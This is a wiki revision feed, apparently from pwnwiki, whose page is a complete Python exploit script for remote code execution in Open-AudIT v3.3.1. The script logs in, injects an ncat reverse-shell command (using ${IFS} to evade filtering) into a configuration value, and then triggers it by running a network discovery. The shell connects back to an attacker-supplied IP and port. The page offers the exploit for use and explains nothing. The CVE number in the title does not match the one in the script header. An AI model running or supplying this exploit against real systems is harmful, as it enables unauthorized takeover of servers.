https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-12078_Open-AudIT_v3.3.1_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-cn 2026-04-13T20:07:37Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2020-12078_Open-AudIT_v3.3.1_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&diff=5191&oldid=prev 2021-06-16T09:37:45Z

<p>Created page with &quot;==漏洞影响==&quot;</p> <p><b>New page</b></p><div>&lt;languages /&gt;<br /> ==漏洞影响==<br /> &lt;pre&gt;<br /> Open-AudIT v3.3.1<br /> &lt;/pre&gt;<br /> <br /> ==EXP==<br /> &lt;pre&gt;<br /> #!/usr/bin/python3<br /> <br /> # Exploit Title: Open-AudIT Professional v3.3.1 Remote Code Execution<br /> # Date: 22/04/2020<br /> # Exploit Author: Askar (@mohammadaskar2)<br /> # CVE: CVE-2020-8813<br /> # Vendor Homepage: https://opmantek.com/<br /> # Version: v3.3.1<br /> # Tested on: Ubuntu 18.04 / PHP 7.2.24<br /> <br /> import requests<br /> import sys<br /> import warnings<br /> import random<br /> import string<br /> from bs4 import BeautifulSoup<br /> from urllib.parse import quote<br /> <br /> warnings.filterwarnings(&quot;ignore&quot;, category=UserWarning, module='bs4')<br /> <br /> <br /> if len(sys.argv) != 6:<br /> print(&quot;[~] Usage : ./openaudit-exploit.py url username password ip port&quot;)<br /> exit()<br /> <br /> url = sys.argv[1]<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> ip = sys.argv[4]<br /> port = sys.argv[5]<br /> <br /> request = requests.session()<br /> <br /> def inject_payload():<br /> configuration_path = url+&quot;/en/omk/open-audit/configuration/90&quot;<br /> data = 'data={&quot;data&quot;:{&quot;id&quot;:&quot;90&quot;,&quot;type&quot;:&quot;configuration&quot;,&quot;attributes&quot;:{&quot;value&quot;:&quot;;ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};&quot;}}}' % (ip, port)<br /> request.patch(configuration_path, data)<br /> print(&quot;[+] Payload injected in settings&quot;)<br /> <br /> <br /> def start_discovery():<br /> discovery_path = url+&quot;/en/omk/open-audit/discoveries/create&quot;<br /> post_discovery_path = url+&quot;/en/omk/open-audit/discoveries&quot;<br /> scan_name = &quot;&quot;.join([random.choice(string.ascii_uppercase) for i in range(10)])<br /> req = request.get(discovery_path)<br /> <br /> response = req.text<br /> soup = BeautifulSoup(response, &quot;html5lib&quot;)<br /> token = soup.findAll('input')[5].get(&quot;value&quot;)<br /> buttons = soup.findAll(&quot;button&quot;)<br /> headers = {&quot;Referer&quot; : discovery_path}<br /> request_data = {<br /> &quot;data[attributes][name]&quot;:scan_name,<br /> &quot;data[attributes][other][subnet]&quot;:&quot;10.10.10.1/24&quot;,<br /> &quot;data[attributes][other][ad_server]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][ad_domain]&quot;:&quot;&quot;,<br /> &quot;submit&quot;:&quot;&quot;,<br /> &quot;data[type]&quot;:&quot;discoveries&quot;,<br /> &quot;data[access_token]&quot;:token,<br /> &quot;data[attributes][complete]&quot;:&quot;y&quot;,<br /> &quot;data[attributes][org_id]&quot;:&quot;1&quot;,<br /> &quot;data[attributes][type]&quot;:&quot;subnet&quot;,<br /> &quot;data[attributes][devices_assigned_to_org]&quot;:&quot;&quot;,<br /> &quot;data[attributes][devices_assigned_to_location]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][nmap][discovery_scan_option_id]&quot;:&quot;1&quot;,<br /> &quot;data[attributes][other][nmap][ping]&quot;:&quot;y&quot;,<br /> &quot;data[attributes][other][nmap][service_version]&quot;:&quot;n&quot;,<br /> &quot;data[attributes][other][nmap][open|filtered]&quot;:&quot;n&quot;,<br /> &quot;data[attributes][other][nmap][filtered]&quot;:&quot;n&quot;,<br /> &quot;data[attributes][other][nmap][timing]&quot;:&quot;4&quot;,<br /> &quot;data[attributes][other][nmap][nmap_tcp_ports]&quot;:&quot;0&quot;,<br /> &quot;data[attributes][other][nmap][nmap_udp_ports]&quot;:&quot;0&quot;,<br /> &quot;data[attributes][other][nmap][tcp_ports]&quot;:&quot;22,135,62078&quot;,<br /> &quot;data[attributes][other][nmap][udp_ports]&quot;:&quot;161&quot;,<br /> &quot;data[attributes][other][nmap][timeout]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][nmap][exclude_tcp_ports]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][nmap][exclude_udp_ports]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][nmap][exclude_ip]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][nmap][ssh_ports]&quot;:&quot;22&quot;,<br /> &quot;data[attributes][other][match][match_dbus]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_fqdn]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_dns_fqdn]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_dns_hostname]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_hostname]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_hostname_dbus]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_hostname_serial]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_hostname_uuid]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_ip]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_ip_no_data]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_mac]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_mac_vmware]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_serial]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_serial_type]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_sysname]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_sysname_serial]&quot;:&quot;&quot;,<br /> &quot;data[attributes][other][match][match_uuid]&quot;:&quot;&quot;<br /> <br /> }<br /> print(&quot;[+] Creating discovery ..&quot;)<br /> req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)<br /> disocvery_url = url + req.headers['Location'] + &quot;/execute&quot;<br /> print(&quot;[+] Triggering payload ..&quot;)<br /> print(&quot;[+] Check your nc ;)&quot;)<br /> request.get(disocvery_url)<br /> <br /> <br /> def login():<br /> login_info = {<br /> &quot;redirect_url&quot;: &quot;/en/omk/open-audit&quot;,<br /> &quot;username&quot;: username,<br /> &quot;password&quot;: password<br /> }<br /> login_request = request.post(url+&quot;/en/omk/open-audit/login&quot;, login_info)<br /> login_text = login_request.text<br /> if &quot;There was an error authenticating&quot; in login_text:<br /> return False<br /> else:<br /> return True<br /> <br /> if login():<br /> print(&quot;[+] LoggedIn Successfully&quot;)<br /> inject_payload()<br /> start_discovery()<br /> else:<br /> print(&quot;[-] Cannot login!&quot;)<br /> &lt;/pre&gt;</div>

Pwnwiki